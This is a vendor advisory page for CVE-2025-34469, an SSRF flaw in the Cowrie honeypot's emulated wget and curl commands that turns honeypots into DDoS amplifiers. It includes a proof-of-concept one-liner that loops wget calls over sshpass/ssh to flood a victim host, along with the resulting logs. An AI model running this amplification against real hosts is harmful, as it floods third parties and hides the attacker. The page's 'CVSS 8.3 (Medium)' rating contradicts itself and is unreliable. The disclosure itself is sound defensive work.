CVE-2025-34469

CVE-2025-34469 is a medium-severity server-side request forgery (SSRF) vulnerability in cowrie (pip), affecting versions < 2.9.0. It is fixed in 2.9.0.

Summary

A Server-Side Request Forgery (SSRF) vulnerability in Cowrie's emulated shell mode allows unauthenticated attackers to abuse the honeypot as an amplification vector for HTTP-based denial-of-service attacks against arbitrary third-party hosts.

Details

When Cowrie operates in emulated shell mode (the default configuration), it basically emulates common Linux commands. The wget and curl command emulations actually perform real outbound HTTP requests to the destinations specified by the attacker, as this functionality is intended to allow Cowrie to save downloaded files for later inspection.

An attacker who connects to the honeypot via SSH or Telnet can repeatedly invoke these commands targeting a victim host. Since there was no rate limiting mechanism in place, the attacker could generate unlimited outbound HTTP traffic toward the victim. The requests originate from the honeypot's IP address, effectively masking the attacker's identity and turning the honeypot into an unwitting participant in distributed denial-of-service (DDoS) attacks.

This vulnerability was observed being actively exploited in the wild.

Acknowledgements
This vulnerability was investigated by Abraham Gebrehiwot and Filippo Lauria, with additional contributions from Michele Castellaneta, Claudio Porta and Sara Afzal. All researchers are affiliated with the Institute of Informatics and Telematics (IIT), Italian National Research Council (CNR).

Fix
This issue has been fixed in version 2.9.0 via PR #2800, which introduces a rate limiting mechanism for outbound requests in command emulations such as wget and curl.

PoC

This is a rudimentary proof of concept demonstrating the amplification potential of this vulnerability.

Setup:

  • Victim machine (192.168.1.30): runs a simple HTTP server
  • Attacker machine (192.168.1.20): initiates the attack
  • Cowrie honeypot (192.168.1.10): configured in emulated shell mode with SSH access (credentials: test:test)

On the victim machine, start an HTTP server:

sudo python3 -m http.server 80

On the attacker machine, execute:

PAYLOAD=$(for i in {1..100}; do echo -n 'wget -q http://192.168.1.30;'; done) && \
for i in {1..10}; do sshpass -p test ssh [email protected] "$PAYLOAD"; done

This command builds a PAYLOAD consisting of 100 concatenated wget commands, then executes it 10 times via SSH, resulting in 1,000 HTTP requests toward the victim from a single attack script. The amplification factor can be arbitrarily increased by adjusting these values, bounded by technical limitations such as argument length, buffer sizes, etc.

Result: The victim's HTTP server logs show 1,000 requests originating exclusively from the honeypot's IP address (192.168.1.10), received within approximately 5 seconds (truncated for brevity):

192.168.1.10 - - [11/Dec/2025 14:33:03] "GET / HTTP/1.1" 200 -
192.168.1.10 - - [11/Dec/2025 14:33:03] "GET / HTTP/1.1" 200 -
192.168.1.10 - - [11/Dec/2025 14:33:03] "GET / HTTP/1.1" 200 -
...
192.168.1.10 - - [11/Dec/2025 14:33:08] "GET / HTTP/1.1" 200 -
192.168.1.10 - - [11/Dec/2025 14:33:08] "GET / HTTP/1.1" 200 -
192.168.1.10 - - [11/Dec/2025 14:33:08] "GET / HTTP/1.1" 200 -

Notice that the attacker's IP (192.168.1.20) never appears in the victim's logs, demonstrating how the honeypot masks the attacker's identity.

Impact

This is a Server-Side Request Forgery (SSRF) vulnerability that enables abuse of Cowrie honeypots as DDoS amplification nodes.

Who is impacted: Any organization running Cowrie in emulated shell mode (the default configuration) with versions prior to 2.9.0.

Consequences:

  • Third-party victims receive unwanted HTTP traffic from the honeypot's IP address
  • Attackers can mask their identity behind the honeypot's IP
  • Honeypot operators may face abuse complaints or have their infrastructure blocklisted
  • Network resources of the honeypot host are consumed

Untrusted input controls the target URL of a server-initiated request, which may reach internal services not otherwise accessible from outside. Typical impact: access to internal metadata services, internal APIs, or cloud credentials.

CVE-2025-34469 has a CVSS score of 8.3 (Medium). The vector is network-reachable, no privileges required, and no user interaction. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. A fixed version is available (2.9.0); upgrading removes the vulnerable code path.

Affected versions

cowrie (< 2.9.0)

Security releases

cowrie → 2.9.0 (pip)

Kodem intelligence

Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.

Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.

See it in your environment

Remediation advice

Upgrade cowrie to 2.9.0 or later to resolve this vulnerability.

Kodem Kai can prioritize this vulnerability in your dependency tree and generate a fix recommendation.

Frequently Asked Questions

  1. What is CVE-2025-34469? CVE-2025-34469 is a medium-severity server-side request forgery (SSRF) vulnerability in cowrie (pip), affecting versions < 2.9.0. It is fixed in 2.9.0. Untrusted input controls the target URL of a server-initiated request, which may reach internal services not otherwise accessible from outside.
  2. How severe is CVE-2025-34469? CVE-2025-34469 has a CVSS score of 8.3 (Medium). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
  3. Which versions of cowrie are affected by CVE-2025-34469? cowrie (pip) versions < 2.9.0 is affected.
  4. Is there a fix for CVE-2025-34469? Yes. CVE-2025-34469 is fixed in 2.9.0. Upgrade to this version or later.
  5. Is CVE-2025-34469 exploitable, and should I be worried? Whether CVE-2025-34469 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
  6. What actually determines whether CVE-2025-34469 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
  7. How do I fix CVE-2025-34469? Upgrade cowrie to 2.9.0 or later.

Other vulnerabilities in cowrie

Stop the waste.
Protect your environment with Kodem.